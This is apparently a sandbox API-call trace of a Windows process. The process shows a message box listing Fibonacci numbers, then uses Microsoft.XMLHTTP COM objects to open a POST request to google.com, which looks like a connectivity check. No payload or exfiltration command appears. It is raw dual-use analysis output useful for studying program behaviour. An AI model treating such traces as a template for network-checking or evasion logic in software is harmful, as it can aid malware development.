	[0206.505] ??2@YAPEAX_K@Z () returned 0x62b080
	[0206.535] ??2@YAPEAX_K@Z () returned 0x629bd0
	[0206.535] GetCurrentThreadId () returned 0xb44
	[0206.535] ??2@YAPEAX_K@Z () returned 0x62b540
	[0206.535] malloc (_Size=0x80) returned 0x62b640
	[0206.535] malloc (_Size=0x108) returned 0x627890
	[0206.535] longjmp () 
	[0206.759] longjmp () 
	[0206.759] malloc (_Size=0x208) returned 0x4691d0
	[0206.759] longjmp () 
	[0206.759] free (_Block=0x62b640) 
	[0206.759] free (_Block=0x4691d0) 
	[0206.759] free (_Block=0x627890) 
	[0206.759] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.759] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.760] GetActiveWindow () returned 0x0
	[0206.775] MessageBoxIndirectW (lpmbp=0x28c9a0*(cbSize=0x50, hwndOwner=0x0, hInstance=0x0, lpszText="- N0T Search: 1; 1; 2; 3; 5; 8; 13; 21; 34; 55; 89; 144; 233; 377; 610; 987; ", lpszCaption="", dwStyle=0x10000, lpszIcon=0x0, dwContextHelpId=0x28c990, lpfnMsgBoxCallback=0x7fef879db70, dwLanguageId=0x409)) returned 1
	[0207.117] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe2b0000
	[0207.117] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefe2ca4c4
	[0207.117] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0207.118] SysStringLen (param_1=0x0) returned 0x0
	[0207.118] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoGetClassObject") returned 0x7fefe2e2e18
	[0207.118] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0209.093] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0209.093] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0209.318] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0209.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b08) returned 0x0
	[0209.319] ??2@YAPEAX_K@Z () returned 0x629bd0
	[0209.319] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b08, pUnkSite=0x629bd0) returned 0x0
	[0209.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0209.833] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0209.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x629bd0) returned 0x0
	[0209.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x629bd0) returned 0x0
	[0209.833] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0209.833] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0209.833] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0209.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0209.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
	[0209.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x629bd0) returned 0x0
	[0209.971] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0209.971] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0209.971] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0209.971] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0209.971] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0209.971] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0209.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x629bd0) returned 0x0
	[0209.971] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0209.971] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0209.971] XMLHTTPRequest:IUnknown:Release (This=0x49c5b08) returned 0x0
	[0210.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0210.138] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0210.138] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa0) returned 0x2
	[0210.138] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa0) returned 0x1
	[0210.138] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x2
	[0210.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0210.139] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0210.149] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x2
	[0210.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0210.150] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c5aa0, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28da10*=0x28dee0) returned 0x0
	[0214.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf68 | out: ppvObject=0x28cf68*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf70 | out: ppvObject=0x28cf70*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0214.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d150 | out: ppvObject=0x28d150*=0x629bd0) returned 0x0
	[0214.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bf70 | out: ppvObject=0x28bf70*=0x629bd0) returned 0x0
	[0214.984] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28bfa8 | out: ppvObject=0x28bfa8*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28bf98 | out: ppvObject=0x28bf98*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c058 | out: ppvObject=0x28c058*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c040 | out: ppvObject=0x28c040*=0x629bd0) returned 0x0
	[0214.984] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c070 | out: ppvObject=0x28c070*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.984] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.985] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.985] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.985] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d168 | out: ppvObject=0x28d168*=0x629bd0) returned 0x0
	[0214.985] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d160 | out: ppvObject=0x28d160*=0x0) returned 0x80004002
	[0214.985] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.985] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0214.985] SysStringLen (param_1=0x0) returned 0x0
	[0214.985] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0214.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0214.985] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0214.986] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0214.986] ??2@YAPEAX_K@Z () returned 0x62b540
	[0214.986] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62b540) returned 0x0
	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IUnknown:AddRef (This=0x62b540) returned 0x2
